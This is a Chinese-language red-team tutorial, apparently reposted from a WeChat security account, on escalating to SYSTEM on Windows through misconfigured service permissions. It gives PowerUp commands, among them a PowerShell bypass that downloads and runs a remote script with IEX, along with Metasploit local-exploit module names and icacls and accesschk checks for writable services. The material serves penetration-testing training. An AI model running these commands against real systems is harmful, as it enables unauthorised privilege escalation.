内网攻防-权限提升-Windows-系统配置错误提权

admin 2022年10月29日17:09:03评论59 views字数 2147阅读7分9秒阅读模式

本文来自“白帽子社区红队知识星球”

作者:BaiKer

内网攻防-权限提升-Windows-系统配置错误提权


内网攻防-权限提升-Windows-系统配置错误提权


白帽子社区红队知识星球

这是一个专属于红队的高级威胁技术研究星球


01

简介

在 Windows 系统中,系统服务文件会在操作系统启动时加载和运行,并在后台调用可执行文件 

理论上,低权限用户是没有对高权限服务调用的可执行文件具有写权限 

但是,如果因为管理员的错误配置,导致一个低权限的用户对此类系统服务调用的可执行文件具有写入权限 

那么低权限用户就可以把该文件替换成任意执行文件,这样就可以劫持系统服务,获取该系统服务的权限 

而 Windows 服务通常是以 system 权限启动运行的,所以低权限用户可以通过此漏洞获取系统权限

02

PowerUp 脚本检测
# 本地加载,检测可利用提权方式import-Module .PowerUp.ps1Invoke-AllCheckspowershell.exe -exec bypass -Command "& {Import-Module .PowerUp.ps1;InvokeAllChecks}"# 远程加载,检测可利用提权方式powershell -nop -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks"# 使用检测到的提权脚本进行提权powershell -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); <利用语句>"

03

MSF 模块检测
# 检测高权限服务替换exploit/windows/local/service_permissions# 检测高权限服务路径exploit/windows/local/unquoted_service_pathset AutoRunScript migrate -f# 检测注册表键 AlwaysInstallElevated 提权exploit/windows/local/always_install_elevated# 检测自动安装配置文件post/windows/gather/enum_unattend


04

icacls 命令检测
在 Windows 系统中,可以通过 icacls 命令查看特定目录的权限情况
icacls 命令/T:显示指定目录下的所有子目录/Q:禁止显示成功的消息/L:指定目录为快捷方式/C:显示错误消息并继续执行
icacls 继承(OI):对象继承(CI):容器继承(IO):仅继承(NP):不传播继承(I):从父容器继承的权限
icacls 简单权限N:无访问权限 F:完全访问权限M:修改权限RX:读取和执行权限R:只读权限W:只写权限D:删除权限
icacls 特定权限DE:删除RC:读取控制 WDAC:写入 DACWO:写入所有者S:同步AS:访问系统安全性MA:允许的最大值GR:一般性读取GW:一般性写入GE:一般性执行GA:全为一般性RD:读取数据/列出目录WD:写入数据/添加文件AD:附加数据/添加子目录REA:读取扩展属性WEA:写入扩展属性X:执行/遍历DC:删除子项RA:读取属性WA:写入属性


查看 test 目录的权限信息

icacls F:test

05

accesschk 工具检测
https://learn.microsoft.com/zh-cn/sysinternals/downloads/accesschk 

在 Windows 中,可以使用 accesschk 工具检测特定用户/组对资源具有哪些权限


accesschk 的命令参数如下

-c:指定 Windows 服务,可以使用通配符 * 显示所有服务-k:指定注册表项-h:指定共享文件,可以使用通配符 * 显示所有共享-p:指定进程名和 PID,可以使用通配符 * 显示所有进程-f:当 -p 存在时,显示令牌详细信息-e:显示 Vista 上具有显式完整性级别的所有文件-d:显示顶级目录-s:显示递归目录-n:显示没有访问权限的文件-r:显示具有读取权限的文件-w:显示具有写入权限的文件-u:不显示错误-v:显示详细信息

在回显中,读取权限表示 R,写入权限表示 W


# 显示特定目录的权限情况accesschk -dv "F:test"# 显示 test 用户对特定目录的权限情况accesschk "test" -dv "F:test"# 显示具有写入权限的服务accesschk -cw *# 显示具有写入权限的进程accesschk -pw *# 查看特定注册表的权限情况accesschk -k hklmsoftware

06

高权限服务替换提权

在 Windows 中,如果我们找到当前用户具有完全控制权限的服务,那么就可以通过替换服务的可执行程序,获取该服务的权限 

原文始发于微信公众号(白帽子社区):内网攻防-权限提升-Windows-系统配置错误提权

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月29日17:09:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网攻防-权限提升-Windows-系统配置错误提权http://cn-sec.com/archives/1364746.html

发表评论

匿名网友 填写信息